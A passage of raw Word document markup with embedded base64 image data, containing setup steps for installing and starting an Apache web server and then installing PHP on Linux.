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&#10;hFAJ8zgGRkAqFq/ATjQQLynwIuf/Xyh+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N2fy+bAMAAGgIAAAOAAAAAAAAAAAAAAAAADwCAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItAAoAAAAAAAAAIQBvr0DwEXkAABF5AAAVAAAAAAAAAAAAAAAAANQFAABkcnMvbWVkaWEvaW1h&#10;Z2UxLmpwZWdQSwECLQAUAAYACAAAACEAiW46ROEAAAAKAQAADwAAAAAAAAAAAAAAAAAYfwAAZHJz&#10;L2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAFhgsxu6AAAAIgEAABkAAAAAAAAAAAAAAAAAJoAA&#10;AGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB9AQAAF4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95;top:95;width:29235;height:1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UaSxQAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gQvYjYKFkldxQotChVrWgreHtlnEsy+TXdXTf99tyD0OMzMN8x82ZlGXMn52rKCcZKC&#10;IC6srrlU8PnxMpqB8AFZY2OZFPyQh+Wi9zDHTNsbH+iah1JECPsMFVQhtJmUvqjIoE9sSxy9k3UG&#10;Q5SulNrhLcJNIydp+igN1hwXKmxpXVFxzi9GwWb/9nzeDqfvu9dveRyv2A/XXzOlBv1u9QQiUBf+&#10;w/f2RiuYwt+VeAPk4hcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDp5UaSxQAAANoAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                  <v:imagedata r:id="rId8" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 6" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:29331;height:11538;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2933065,115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hCxAAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gQvoW5iIJTUVaQiaA8FbSl4e2RfN6HZtyG7JvHfdwuFHoeZ+YZZbyfbioF63zhWkC1T&#10;EMSV0w0bBR/vh8cnED4ga2wdk4I7edhuHmZrLLUb+UzDJRgRIexLVFCH0JVS+qomi37pOuLofbne&#10;YoiyN1L3OEa4beUqTQtpseG4UGNHLzVV35ebVZDb1zxJdWL2J5MnOvu84tu1U2oxn3bPIAJN4T/8&#10;1z5qBQX8Xok3QG5+AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMuDOELEAAAA2gAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,1153731r2933065,l2933065,,,,,1153731xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5FF952" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EC9375" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="510"/>
        </w:tabs>
        <w:ind w:left="510" w:hanging="150"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E1D316" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106BB5D5" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="510"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="510" w:hanging="150"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>opening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>going</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:color w:val="0462C1"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>http://localhost</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F2B60C2" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="510"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="510" w:hanging="150"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Then</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E2BA4AF" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487588864" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6FE98EB4" wp14:editId="6E148A32">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>923925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>154367</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4001770" cy="96710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1770" cy="967105"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4001770" cy="967105"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="8" name="Image 8"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId10" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9588"/>
                            <a:ext cx="3982720" cy="947927"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="9" name="Graphic 9"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="3992245" cy="957580"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3992245" h="957580">
                                <a:moveTo>
                                  <a:pt x="0" y="957452"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3992245" y="957452"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3992245" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="957452"/>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B64912" id="Group 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:72.75pt;margin-top:12.15pt;width:315.1pt;height:76.15pt;z-index:-15727616;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="40017,9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4TZxxAwAAYAgAAA4AAABkcnMvZTJvRG9jLnhtbJxWbU/bMBD+Pmn/&#10;Icp3SBta2kYUNNFRISGGBtM+u46TWDi2Z7sv/PvdOXYb6F5BIjnH5/Pj55479+Jq14pkw4zlSs7T&#10;4ekgTZikquSynqffnm5OpmliHZElEUqyefrCbHp1+fHDxVYXLFeNEiUzCQSRttjqedo4p4sss7Rh&#10;LbGnSjMJk5UyLXEwNHVWGrKF6K3I8sHgPNsqU2qjKLMWvi66yfTSx68qRt2XqrLMJWKeAjbnn8Y/&#10;V/jMLi9IURuiG04DDPIOFC3hEjbdh1oQR5K14UehWk6Nsqpyp1S1maoqTpk/A5xmOHhzmqVRa+3P&#10;UhfbWu9pAmrf8PTusPR+szT6UT+YDj2Yd4o+W+Al2+q66M/juD447yrT4iI4RLLzjL7sGWU7l1D4&#10;OBoMhpMJEE9hbnY+GQ7GHeW0gbwcLaPN5z8vzEjRbevB7cFoTgv4DwSBdUTQ34UEq9zasDQEaf8p&#10;RkvM81qfQC41cXzFBXcvXpeQNQQlNw+cIrc4AC4fTMLLeQpFIUkL5XDbkpolU+QkeqA/sn+0fCW4&#10;vuFCIOdoB6Ag5jdi+MVZO6EtFF23TLqucgwTgFlJ23Bt08QUrF0xAGduyyEkDKrWAUJtuHRdzqwz&#10;zNEG968Ax1coLgRKiv2EB33AiUewQVpv1DIb5+M0QVGMp/74pIiaOZtN80keNTOazPIJ7r9PPSm0&#10;sW7JVJugAYABCPBNCrK5swFSdAlEdig8PACF3QHajY0UwuiIxP+qqMeGaAYQMOwhy7OY5WXoLzM8&#10;R/DBkguj31A0mpznniJvgG+folmej4BAX1bjyXjqO1mPIrruKOrTAt2p7AgCqppo0Z2MJhKJjVL4&#10;RulAE0BumkCjXHUKAJHjOgyKZrKdp2ezAKXBXHokON2qDXtS3tEdyhwcRuM8ZPPgImTfdR/Rq6O3&#10;ILrFt/aR++6RhegR350nSCp2KGAqzsV33+cVzuhAhbIM0gBr8fB7wxMCH/uUC4nceJEjB1YJXsba&#10;taZeXQuTbAjeSf4vMPLKDRW8ILbp/PxUcBMS9kYZdcJBa6XKF+gtWxDaPLU/1gQbmbiVoGu89aJh&#10;orGKhnHiWvm70ecK9nzafSdGh9JyUJT3Ksr7qMI6X1wp1ae1UxX35XdAFIBCqXnLX2OeuHDl4j3Z&#10;H3uvww+Dy58AAAD//wMAUEsDBAoAAAAAAAAAIQAVpG3PpFUAAKRVAAAVAAAAZHJzL21lZGlhL2lt&#10;YWdlMS5qcGVn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoH&#10;BwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkU&#10;DQsNFBQUFBQUFB